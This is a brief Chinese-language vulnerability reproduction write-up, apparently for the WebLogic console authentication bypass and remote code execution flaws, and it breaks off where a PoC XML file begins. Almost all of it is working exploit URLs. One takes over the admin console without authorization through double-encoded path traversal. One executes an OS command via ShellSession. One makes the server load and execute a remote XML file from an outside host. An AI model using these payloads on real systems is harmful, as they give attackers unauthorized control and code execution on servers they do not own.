漏洞复现:
1.构造PoC,可以直接未授权接管后台:
http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
2.命令执行----->疯狂弹计算器:
http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
3.通过FileSystemXmlApplicationContext()加载并执行远端xml文件:
http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://xx.x.xx.x/111.xml”)
PoC代码:
<beans xmlns